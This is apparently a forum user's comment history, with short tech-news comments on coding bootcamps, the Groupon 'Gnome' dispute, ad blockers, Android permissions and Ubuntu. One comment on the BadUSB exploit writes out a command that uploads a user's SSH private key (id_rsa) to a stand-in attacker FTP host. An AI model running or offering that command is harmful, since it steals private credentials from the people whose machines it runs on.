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User: jakimfett

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  1. Re:Here we go again on Coding Bootcamps Presented As "College Alternative" · · Score: 1

    Given how insanely important this particular statement is to the whole conversation, I'm surprised I had to scroll almost all the way down to the bottom before someone brought it up.

    This bit is why I personally think it's an excellent idea...they aren't trying to produce fully fledged senior developers ready to lead a team of developers in building/maintaining/re-purposing a fortune 500 company's mission critical systems.

    They're trying to jumpstart the beginnings of that...the mindset that will, one day far down the road (if the individual is motivated to continue learning) will produce an exceptional programmer.

  2. Re:yaaaaaaay... on Coding Bootcamps Presented As "College Alternative" · · Score: 1

    Question...where are you finding prices below $0.035 (or $0.045 if we're counting shipping) for the parts to make an LED blink?

  3. Re:Don't mess with the geek's toys on Groupon Backs Down On Gnome · · Score: 1

    I disagree. If I were the tech guy at say...Lowes (which, admittedly, I'm not), the similar name would be a point of confusion for middle management.

    Manager: "Hey, I heard about this new Gnome thing that Groupon is offering to install for Significantly Reduced Prices. You've been bothering me for the last year about upgrading our own gnome system, why not let them do the upgrade?"
    IT Guy: "There's a huge difference between GNOME and Gnome, sir."
    Manager: "Doesn't sound like there is, they both do point of sale, and Groupon has TOUCH! Everybody wants touchscreens, right?"
    IT Guy: "Please just kill me now"

    Yes, there's a lot of copyright bullshittery happening...but despite my own personal distaste for the GNOME project, this is bigger than that. Given that Groupon was trying to establish a presence in a market that GNOME already had a presence in, I'd think it'd kinda fall into the realm of "valid defense of a mark".

    To use the vulnerable car analogy:
    The GNOME group was running a small dealership that gave away free mopeds with the "GNOME" name on them.
    A nearby radio station decides to start up a motorcycle dealership, selling motorbikes they call "Gnome".
    End result would be that if I say "I got a payout from my bitcoin miner, I'm going to go buy myself a gnome", you might not know whether I'm getting a moped or a motorbike.

  4. Re:Don't mess with the geek's toys on Groupon Backs Down On Gnome · · Score: 4, Insightful

    Reading. Do you even?

    Groupon was rolling out a Point-Of-Sale touch interface thin OS system, calling it Gnome. Perhaps you can see how this would possibly be confused with the GNOME touch capable OS, which is (at least in some Lowe's locations) installed on Point-Of-Sale systems.

  5. Re:Public servants don't give an arm and a leg on Every Day Is Goof-Off-At-Work Day At the US Patent and Trademark Office · · Score: 1

    No clue why this was marked "redundant". From what I can see, this is the point that everyone else is missing...it's not about a couple of guys occasionally goofing off, it's a culture of slacking off, then rushing and pushing through shoddy work, which has resulted in some fairly retarded patents getting approved, even in cases where prior art was clear.

  6. Re:USB 4.x to offer signed USB device signatures?? on "BadUSB" Exploit Makes Devices Turn "Evil" · · Score: 2

    I eat Cheetos, you insensitive clod!

  7. Re:How is this viable as an attack medium? on "BadUSB" Exploit Makes Devices Turn "Evil" · · Score: 2

    I'd be interested to see how well this works against linux workstations. Having the ability to arbitrarily send keyboard commands will only be effective if a) they're the correct key commands (eg, the shortcut to open the terminal client, or a web browser, which changes depending on your desktop environment) and you can actually *do* those commands. Eg, "rm -rf /" isn't going to work without the superuser password.

    That said...something like "cd ~/.ssh;ftp attack@myserver.hack;put id_rsa;exit" wouldn't necessarily need any sort of high level access...and getting ahold of someone's private key is akin to getting the holy grail, especially if you can do it without them realizing it.

  8. Re:Leverage on "BadUSB" Exploit Makes Devices Turn "Evil" · · Score: 1

    $hat = 'tinfoil'

    Nah, Leverage is just an illegally de-classified documentary of a black ops crime fighting unit from the future, sent back to us by the rebels as a warning about what's coming next.

  9. Re:USB 4.x to offer signed USB device signatures?? on "BadUSB" Exploit Makes Devices Turn "Evil" · · Score: 2

    At the point where a hacker has physical access to one of your machines, you have bigger problems than whether they're going to swap out your mouse for something more easily hackable.

  10. Re: uno on London Police Placing Anti-Piracy Warning Ads On Illegal Sites · · Score: 1

    Who is surfing to such sites without AdBlocker and NoScript shields up

    I basically came here to say exactly this. Adblock Plus, NoScript, Ghostery, FlashBlock...whenever I browse the internet without them (eg, on a friend's computer, or when doing tech support, or when re-installing an OS) I have a moment of "...the heck are these abominations?" before I remember that, oh right, the internet has ads.

  11. Re:Sue them for all they're worth on Microsoft Takes Down No-IP.com Domains · · Score: 2
    Try reading a bit deeper. This from the TechNet article:

    On June 19, Microsoft filed for an ex parte temporary restraining order...

    ex parte : "a legal proceeding brought by one person in the absence of and without representation or notification of other parties."

    Translation: Microsoft *never notified* No-IP. There was no summons. There was no notification. There was no chance to file for a stay of judgement or make an appeal.

  12. Re:There's a reason books can't be updated on US Navy Develops World's Worst E-reader · · Score: 1

    This here is the point that most of the "waaa, gps is receive only, not a threat, Moffitt is clueless, waaa!" crowd misses. In a situation requiring strict operational security, anything that stores your location in a potentially retrievable manner is controlled

  13. Re:Cheaper beer on The Man Behind Munich's Migration of 15,000 PCs From Windows To Linux · · Score: 1

    I'm kinda surprised more people haven't brought this up, especially with all the conversations about XP EOL happening right now.

  14. Re:De-facto reality on Ad Tracking: Is Anything Being Done? · · Score: 1

    I already commented on this thread, otherwise I'd be modding this comment up.

    Every few months, I use a browser without the essentials (NoScript/FlashBlock/Ghostery/AdBlockPlus) installed, and the internet is nearly unusable. Popups, ads, popup ads, autoplaying media, autoplaying media ads...the list goes on. Running the gantlet almost isn't worth it, and I retreat back into the solitude that is the ad-free internet.

    I still don't understand how people still use IE.

  15. Re:Wear the tin foil hat on Ad Tracking: Is Anything Being Done? · · Score: 1

    I normally allow top level sites in NoScript by default. 99% of the time, the "functional" javascript is served by the domain you're visiting, and that javascript-based ad you're trying to avoid is hosted offsite.

    Basically, as websites evolve, so does NoScript.

  16. Re:Think of the children on Why Does Facebook Need To Read My Text Messages? · · Score: 1

    Depending on your android version, you can disable specific apps. But I think you have to have a 4.x build of android.

  17. Re:Think of the children on Why Does Facebook Need To Read My Text Messages? · · Score: 1

    I've been quite pleased with the performance increases and security enhancements provided by Cyanogenmod. But then...I'm also willing to break my phone a couple of times if necessary while trimming away unnecessary permissions from apps.

  18. Re:It means the same thing on Facebook Mocks 'Infection' Study, Predicts Princeton's Demise · · Score: 1

    But only because it makes the grammar nazis upset.

  19. Re: Pseudoscience on Facebook Mocks 'Infection' Study, Predicts Princeton's Demise · · Score: 1

    It was pretty clear two me. But then, their are people without a sense of humor, so aisle forgive you this once. /deadpan

  20. Re:"post-food consumers" on 20,000 Customers Have Pre-Ordered Over $2,000,000 of Soylent · · Score: 1

    You didn't read up on it, did you.

  21. I'm sorry, apparently you were born before they invented things like "tact" and "manners". You should try them out, it might be a pleasant change...both for you, and everyone you communicate with.

  22. I really wish I had mod points, because this made me crack up. (Here's the link, for those of you still wondering who Bobby is...)

  23. Re:Okay, but... on Hacker Says He Could Access 70,000 Healthcare.Gov Records In 4 Minutes · · Score: 1
    Actually, in the context of this sub-thread, it was spot on. Notice that user "funwithBSD" stated that:

    ...as Sysadmin for a major healthcare company for 9 years, every single "hack" was the loss of a laptop or hard drive...

    Which means that, as far as I know, suggesting a form of local encryption is perfectly relevant.

  24. Re:9.1 on Windows 9 Already? Apparently, Yes. · · Score: 1

    This. Very much this.

    I started using Ubuntu in 2005. I used it for servers and for a lightweight desktop alternative. I recommended it to my friends.

    Then came the dark times, when Unity became default. For a while, I continued perplexed, assuming that it would get fixed. It never did.

    I'm quite happily running Xubuntu, Raspbian, and Elementary OS now. I won't touch Unity with a logic probe, not if they paid me to.

  25. Re:Because plastic is for pansies on Solid Concepts Manufactures First 3D-Printed Metal Pistol · · Score: 1

    This is the only correct response.